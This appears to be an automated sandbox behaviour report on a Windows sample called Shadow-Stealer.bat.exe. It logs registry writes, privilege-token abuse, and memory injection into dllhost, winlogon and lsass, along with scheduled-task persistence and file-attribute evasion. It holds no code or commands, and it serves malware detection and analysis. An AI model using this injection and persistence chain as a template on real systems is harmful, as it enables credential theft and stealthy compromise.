Key deleted \REGISTRY\USER\S-1-5-21-3001105534-2705918504-2956618779-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\2151f160-fd5c-4d32 C:\Windows\System32\RuntimeBroker.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-3001105534-2705918504-2956618779-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.contentdeliverymanager_cw5n1h2txyewy\Internet Settings\Cache\Extensible Cache\BackgroundTr = "9" C:\Windows\system32\DllHost.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-3001105534-2705918504-2956618779-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\28ef3c51-9c09-4a07 = "8324" C:\Windows\System32\RuntimeBroker.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3001105534-2705918504-2956618779-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\2151f160-fd5c-4d32 = "\\\\?\\Volume{77C203EA-0000-0000-0000-D01200000000}\\Users\\Admin\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\StagedAssets\\7ed11556e0761b6e0764bdb39a077fcd9fbaaa63ca46e07b80b5f5faa4d595c4" C:\Windows\System32\RuntimeBroker.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-3001105534-2705918504-2956618779-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\2151f160-fd5c-4d32 = "0" C:\Windows\System32\RuntimeBroker.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-3001105534-2705918504-2956618779-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\7b8e0197-4d56-4b59 = 00d91a60e1b0da01 C:\Windows\System32\RuntimeBroker.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-3001105534-2705918504-2956618779-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\7b8e0197-4d56-4b59 = 0114020000000000c0000000000000464c0000000114020000000000c0000000000000468300000020000000e264a05fe1b0da0139d7f35fe1b0da0139d7f35fe1b0da01619206000000000001000000000000000000000000000000260514001f50e04fd020ea3a6910a2d808002b30309d19002f433a5c0000000000000000000000000000000000000050003100000000000000000010005573657273003c0009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000005500730065007200730000001400500031000000000000000000100041646d696e003c0009000400efbe00000000000000002e0000000000000000000000000000000000000000000000000000000000410064006d0069006e000000140056003100000000000000000010004170704461746100400009000400efbe00000000000000002e000000000000000000000000000000000000000000000000000000000041007000700044006100740061000000160050003100000000000000000010004c6f63616c003c0009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000004c006f00630061006c00000014005a003100000000000000000010005061636b616765730000420009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000005000610063006b00610067006500730000001800e4003100000000000000000010004d6963726f736f66742e57696e646f77732e436f6e74656e7444656c69766572794d616e616765725f6377356e31683274787965777900009e0009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000004d006900630072006f0073006f00660074002e00570069006e0064006f00770073002e0043006f006e00740065006e007400440065006c00690076006500720079004d0061006e0061006700650072005f006300770035006e003100680032007400780079006500770079000000460060003100000000000000000010004c6f63616c53746174650000460009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000004c006f00630061006c005300740061007400650000001a00660031000000000000000000100053746167656441737365747300004a0009000400efbe00000000000000002e000000000000000000000000000000000000000000000000000000000053007400610067006500640041007300730065007400730000001c00ad01320000000000bc58894b2000366332653934636136653565313632336632366236656430393433663566643364613764356161343437303330303366353164656366386133373734393761620000b20009000400efbebc58894bbc58894b2e000000000000000000000000000000000000000000000000001f2a3500360063003200650039003400630061003600650035006500310036003200330066003200360062003600650064003000390034003300660035006600640033006400610037006400350061006100340034003700300033003000300033006600350031006400650063006600380061003300370037003400390037006100620000005000ab0000002700efbe9d00000031535053b79daeff8d1cff43818c84403aa3732d8100000064000000001f000000370000004d006900630072006f0073006f00660074002e00570069006e0064006f00770073002e0043006f006e00740065006e007400440065006c00690076006500720079004d0061006e0061006700650072005f006300770035006e0031006800320074007800790065007700790000000000000000000000000050000000eb0000001c000000010000001c0000003400000000000000ea0000001800000003000000ad935d631000000057696e646f777300433a5c55736572735c41646d696e5c417070446174615c4c6f63616c5c5061636b616765735c4d6963726f736f66742e57696e646f77732e436f6e74656e7444656c69766572794d616e616765725f6377356e3168327478796577795c4c6f63616c53746174655c5374616765644173736574735c36633265393463613665356531363233663236623665643039343366356664336461376435616134343730333030336635316465636638613337373439376162000010000000050000a028000000cd0000001c0000000b0000a08f856c5e220e60479afeea3317b67173cd00000060000000030000a058000000000000006f79686b657073700000000000000000bec64950ab2ed349b7ae457a2f4666b3f6f788fe3f0def11969966afb9d723e1bec64950ab2ed349b7ae457a2f4666b3f6f788fe3f0def11969966afb9d723e1d2000000090000a08d00000031535053e28a5846bc4c3843bbfc139326986dce7100000004000000001f0000002f00000053002d0031002d0035002d00320031002d0033003000300031003100300035003500330034002d0032003700300035003900310038003500300034002d0032003900350036003600310038003700370039002d00310030003000300000000000000000003900000031535053b1166d44ad8d7048a748402ea43d788c1d000000680000000048000000ea03c277000000000000d01200000000000000000000000000000000 C:\Windows\System32\RuntimeBroker.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3001105534-2705918504-2956618779-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\a92d4245-418e-4a4d = "\\\\?\\Volume{77C203EA-0000-0000-0000-D01200000000}\\Users\\Admin\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\StagedAssets\\7ed11556e0761b6e0764bdb39a077fcd9fbaaa63ca46e07b80b5f5faa4d595c4" C:\Windows\System32\RuntimeBroker.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-3001105534-2705918504-2956618779-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.contentdeliverymanager_cw5n1h2txyewy\Internet Settings\Cache\Extensible Cache\BackgroundTr = "1" C:\Windows\system32\DllHost.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3001105534-2705918504-2956618779-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\28ef3c51-9c09-4a07 = "Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy" C:\Windows\System32\RuntimeBroker.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-3001105534-2705918504-2956618779-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\d8d78d58-93cd-47c8 = "0" C:\Windows\System32\RuntimeBroker.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-3001105534-2705918504-2956618779-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\a92d4245-418e-4a4d = "0" C:\Windows\System32\RuntimeBroker.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3001105534-2705918504-2956618779-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\cac1e44a-d821-4a00 C:\Windows\System32\RuntimeBroker.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3001105534-2705918504-2956618779-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\a92d4245-418e-4a4d C:\Windows\System32\RuntimeBroker.exe N/A

Runs ping.exe

Description Indicator Process Target
N/A N/A C:\Windows\system32\PING.EXE N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\Shadow-Stealer.bat.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Shadow-Stealer.bat.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Shadow-Stealer.bat.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\SysWOW64\dllhost.exe N/A
N/A N/A C:\Windows\SysWOW64\dllhost.exe N/A
N/A N/A C:\Windows\SysWOW64\dllhost.exe N/A
N/A N/A C:\Windows\SysWOW64\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Shadow-Stealer.bat.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Shadow-Stealer.bat.exe N/A
N/A N/A C:\Windows\$sxr-powershell.exe N/A
N/A N/A C:\Windows\$sxr-powershell.exe N/A
N/A N/A C:\Windows\$sxr-powershell.exe N/A
N/A N/A C:\Windows\$sxr-powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\dllhost.exe N/A
N/A N/A C:\Windows\SysWOW64\dllhost.exe N/A
N/A N/A C:\Windows\SysWOW64\dllhost.exe N/A
N/A N/A C:\Windows\SysWOW64\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\$sxr-powershell.exe N/A
N/A N/A C:\Windows\$sxr-powershell.exe N/A
N/A N/A C:\Windows\$sxr-powershell.exe N/A
N/A N/A C:\Windows\$sxr-powershell.exe N/A
N/A N/A C:\Windows\$sxr-powershell.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\SysWOW64\dllhost.exe N/A
N/A N/A C:\Windows\SysWOW64\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\SysWOW64\dllhost.exe N/A
N/A N/A C:\Windows\SysWOW64\dllhost.exe N/A
N/A N/A C:\Windows\$sxr-powershell.exe N/A
N/A N/A C:\Windows\$sxr-powershell.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\SysWOW64\dllhost.exe N/A
N/A N/A C:\Windows\SysWOW64\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\SysWOW64\dllhost.exe N/A
N/A N/A C:\Windows\SysWOW64\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\SysWOW64\dllhost.exe N/A
N/A N/A C:\Windows\SysWOW64\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\SysWOW64\dllhost.exe N/A
N/A N/A C:\Windows\SysWOW64\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\SysWOW64\dllhost.exe N/A
N/A N/A C:\Windows\SysWOW64\dllhost.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\Shadow-Stealer.bat.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\Shadow-Stealer.bat.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\dllhost.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\dllhost.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\$sxr-powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\$sxr-powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\dllhost.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\dllhost.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\$sxr-powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\$sxr-powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\dllhost.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\dllhost.exe N/A
Token: SeAssignPrimaryTokenPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeAssignPrimaryTokenPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeAssignPrimaryTokenPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeAssignPrimaryTokenPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeAssignPrimaryTokenPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\svchost.exe N/A

Suspicious use of SetWindowsHookEx

Description Indicator Process Target
N/A N/A C:\Windows\$sxr-powershell.exe N/A
N/A N/A C:\Windows\System32\Conhost.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 3588 wrote to memory of 1904 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\AppData\Local\Temp\Shadow-Stealer.bat.exe
PID 3588 wrote to memory of 1904 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\AppData\Local\Temp\Shadow-Stealer.bat.exe
PID 1904 wrote to memory of 4988 N/A C:\Users\Admin\AppData\Local\Temp\Shadow-Stealer.bat.exe C:\Windows\System32\dllhost.exe
PID 1904 wrote to memory of 4988 N/A C:\Users\Admin\AppData\Local\Temp\Shadow-Stealer.bat.exe C:\Windows\System32\dllhost.exe
PID 1904 wrote to memory of 4988 N/A C:\Users\Admin\AppData\Local\Temp\Shadow-Stealer.bat.exe C:\Windows\System32\dllhost.exe
PID 1904 wrote to memory of 4988 N/A C:\Users\Admin\AppData\Local\Temp\Shadow-Stealer.bat.exe C:\Windows\System32\dllhost.exe
PID 1904 wrote to memory of 4988 N/A C:\Users\Admin\AppData\Local\Temp\Shadow-Stealer.bat.exe C:\Windows\System32\dllhost.exe
PID 1904 wrote to memory of 4988 N/A C:\Users\Admin\AppData\Local\Temp\Shadow-Stealer.bat.exe C:\Windows\System32\dllhost.exe
PID 1904 wrote to memory of 4988 N/A C:\Users\Admin\AppData\Local\Temp\Shadow-Stealer.bat.exe C:\Windows\System32\dllhost.exe
PID 1904 wrote to memory of 2076 N/A C:\Users\Admin\AppData\Local\Temp\Shadow-Stealer.bat.exe C:\Windows\SysWOW64\dllhost.exe
PID 1904 wrote to memory of 2076 N/A C:\Users\Admin\AppData\Local\Temp\Shadow-Stealer.bat.exe C:\Windows\SysWOW64\dllhost.exe
PID 1904 wrote to memory of 2076 N/A C:\Users\Admin\AppData\Local\Temp\Shadow-Stealer.bat.exe C:\Windows\SysWOW64\dllhost.exe
PID 1904 wrote to memory of 2076 N/A C:\Users\Admin\AppData\Local\Temp\Shadow-Stealer.bat.exe C:\Windows\SysWOW64\dllhost.exe
PID 1904 wrote to memory of 2076 N/A C:\Users\Admin\AppData\Local\Temp\Shadow-Stealer.bat.exe C:\Windows\SysWOW64\dllhost.exe
PID 1904 wrote to memory of 2076 N/A C:\Users\Admin\AppData\Local\Temp\Shadow-Stealer.bat.exe C:\Windows\SysWOW64\dllhost.exe
PID 1904 wrote to memory of 2076 N/A C:\Users\Admin\AppData\Local\Temp\Shadow-Stealer.bat.exe C:\Windows\SysWOW64\dllhost.exe
PID 1904 wrote to memory of 2076 N/A C:\Users\Admin\AppData\Local\Temp\Shadow-Stealer.bat.exe C:\Windows\SysWOW64\dllhost.exe
PID 1904 wrote to memory of 2076 N/A C:\Users\Admin\AppData\Local\Temp\Shadow-Stealer.bat.exe C:\Windows\SysWOW64\dllhost.exe
PID 1160 wrote to memory of 4396 N/A C:\Windows\$sxr-mshta.exe C:\Windows\$sxr-cmd.exe
PID 1160 wrote to memory of 4396 N/A C:\Windows\$sxr-mshta.exe C:\Windows\$sxr-cmd.exe
PID 4396 wrote to memory of 3264 N/A C:\Windows\$sxr-cmd.exe C:\Windows\$sxr-powershell.exe
PID 4396 wrote to memory of 3264 N/A C:\Windows\$sxr-cmd.exe C:\Windows\$sxr-powershell.exe
PID 3264 wrote to memory of 1932 N/A C:\Windows\$sxr-powershell.exe C:\Windows\System32\dllhost.exe
PID 3264 wrote to memory of 1932 N/A C:\Windows\$sxr-powershell.exe C:\Windows\System32\dllhost.exe
PID 3264 wrote to memory of 1932 N/A C:\Windows\$sxr-powershell.exe C:\Windows\System32\dllhost.exe
PID 3264 wrote to memory of 1932 N/A C:\Windows\$sxr-powershell.exe C:\Windows\System32\dllhost.exe
PID 3264 wrote to memory of 1932 N/A C:\Windows\$sxr-powershell.exe C:\Windows\System32\dllhost.exe
PID 3264 wrote to memory of 1932 N/A C:\Windows\$sxr-powershell.exe C:\Windows\System32\dllhost.exe
PID 3264 wrote to memory of 1932 N/A C:\Windows\$sxr-powershell.exe C:\Windows\System32\dllhost.exe
PID 3264 wrote to memory of 2864 N/A C:\Windows\$sxr-powershell.exe C:\Windows\SysWOW64\dllhost.exe
PID 3264 wrote to memory of 2864 N/A C:\Windows\$sxr-powershell.exe C:\Windows\SysWOW64\dllhost.exe
PID 3264 wrote to memory of 2864 N/A C:\Windows\$sxr-powershell.exe C:\Windows\SysWOW64\dllhost.exe
PID 3264 wrote to memory of 2864 N/A C:\Windows\$sxr-powershell.exe C:\Windows\SysWOW64\dllhost.exe
PID 3264 wrote to memory of 2864 N/A C:\Windows\$sxr-powershell.exe C:\Windows\SysWOW64\dllhost.exe
PID 3264 wrote to memory of 2864 N/A C:\Windows\$sxr-powershell.exe C:\Windows\SysWOW64\dllhost.exe
PID 3264 wrote to memory of 2864 N/A C:\Windows\$sxr-powershell.exe C:\Windows\SysWOW64\dllhost.exe
PID 3264 wrote to memory of 2864 N/A C:\Windows\$sxr-powershell.exe C:\Windows\SysWOW64\dllhost.exe
PID 3264 wrote to memory of 2864 N/A C:\Windows\$sxr-powershell.exe C:\Windows\SysWOW64\dllhost.exe
PID 3264 wrote to memory of 2536 N/A C:\Windows\$sxr-powershell.exe C:\Windows\$sxr-powershell.exe
PID 3264 wrote to memory of 2536 N/A C:\Windows\$sxr-powershell.exe C:\Windows\$sxr-powershell.exe
PID 3264 wrote to memory of 1684 N/A C:\Windows\$sxr-powershell.exe C:\Windows\System32\dllhost.exe
PID 3264 wrote to memory of 1684 N/A C:\Windows\$sxr-powershell.exe C:\Windows\System32\dllhost.exe
PID 3264 wrote to memory of 1684 N/A C:\Windows\$sxr-powershell.exe C:\Windows\System32\dllhost.exe
PID 3264 wrote to memory of 1684 N/A C:\Windows\$sxr-powershell.exe C:\Windows\System32\dllhost.exe
PID 3264 wrote to memory of 1684 N/A C:\Windows\$sxr-powershell.exe C:\Windows\System32\dllhost.exe
PID 3264 wrote to memory of 1684 N/A C:\Windows\$sxr-powershell.exe C:\Windows\System32\dllhost.exe
PID 3264 wrote to memory of 1684 N/A C:\Windows\$sxr-powershell.exe C:\Windows\System32\dllhost.exe
PID 3264 wrote to memory of 1684 N/A C:\Windows\$sxr-powershell.exe C:\Windows\System32\dllhost.exe
PID 3264 wrote to memory of 1684 N/A C:\Windows\$sxr-powershell.exe C:\Windows\System32\dllhost.exe
PID 1684 wrote to memory of 636 N/A C:\Windows\System32\dllhost.exe C:\Windows\system32\winlogon.exe
PID 1684 wrote to memory of 692 N/A C:\Windows\System32\dllhost.exe C:\Windows\system32\lsass.exe
PID 1684 wrote to memory of 1000 N/A C:\Windows\System32\dllhost.exe C:\Windows\system32\svchost.exe
PID 1684 wrote to memory of 556 N/A C:\Windows\System32\dllhost.exe C:\Windows\system32\dwm.exe
PID 1684 wrote to memory of 708 N/A C:\Windows\System32\dllhost.exe C:\Windows\System32\svchost.exe
PID 1684 wrote to memory of 752 N/A C:\Windows\System32\dllhost.exe C:\Windows\system32\svchost.exe
PID 1684 wrote to memory of 1076 N/A C:\Windows\System32\dllhost.exe C:\Windows\System32\svchost.exe
PID 1684 wrote to memory of 1084 N/A C:\Windows\System32\dllhost.exe C:\Windows\system32\svchost.exe
PID 1684 wrote to memory of 1136 N/A C:\Windows\System32\dllhost.exe C:\Windows\system32\svchost.exe
PID 1684 wrote to memory of 1208 N/A C:\Windows\System32\dllhost.exe C:\Windows\system32\svchost.exe
PID 1684 wrote to memory of 1252 N/A C:\Windows\System32\dllhost.exe C:\Windows\System32\svchost.exe
PID 1684 wrote to memory of 1308 N/A C:\Windows\System32\dllhost.exe C:\Windows\system32\svchost.exe
PID 1684 wrote to memory of 1432 N/A C:\Windows\System32\dllhost.exe C:\Windows\system32\svchost.exe
PID 1684 wrote to memory of 1472 N/A C:\Windows\System32\dllhost.exe C:\Windows\system32\svchost.exe
PID 1684 wrote to memory of 1492 N/A C:\Windows\System32\dllhost.exe C:\Windows\System32\svchost.exe

Uses Task Scheduler COM API

persistence

Views/modifies file attributes

evasion
Description Indicator Process Target
N/A N/A C:\Windows\system32\attrib.exe N/A

Processes

C:\Windows\system32\winlogon.exe

winlogon.exe

C:\Windows\system32\lsass.exe

C:\Windows\system32\lsass.exe

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM

C:\Windows\system32\dwm.exe

"dwm.exe"

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s lmhosts

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s TimeBrokerSvc

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k LocalService -p -s nsi

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k netprofm -p -s netprofm

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k netsvcs -p -s ProfSvc

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k LocalService -p -s DispBrokerDesktopSvc

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k netsvcs -p -s UserManager

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s EventLog

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k LocalService -p -s EventSystem

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k netsvcs -p -s Themes

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k NetworkService -p

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k netsvcs -p -s SENS

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s Dhcp

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s AudioEndpointBuilder

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k appmodel -p -s StateRepository

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k netsvcs -p -s ShellHWDetection

C:\Windows\System32\spoolsv.exe

C:\Windows\System32\spoolsv.exe

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k NetworkService -p -s LanmanWorkstation

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k netsvcs -p -s IKEEXT

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k NetworkServiceNetworkRestricted -p -s PolicyAgent

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k NetworkService -p

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k netsvcs -p -s LanmanServer

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -s RmSvc

C:\Windows\sysmon.exe

C:\Windows\sysmon.exe

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s TrkWks

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k netsvcs -p -s Winmgmt

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k netsvcs -p -s WpnService

C:\Windows\system32\sihost.exe

sihost.exe

C:\Windows\system32\svchost.exe

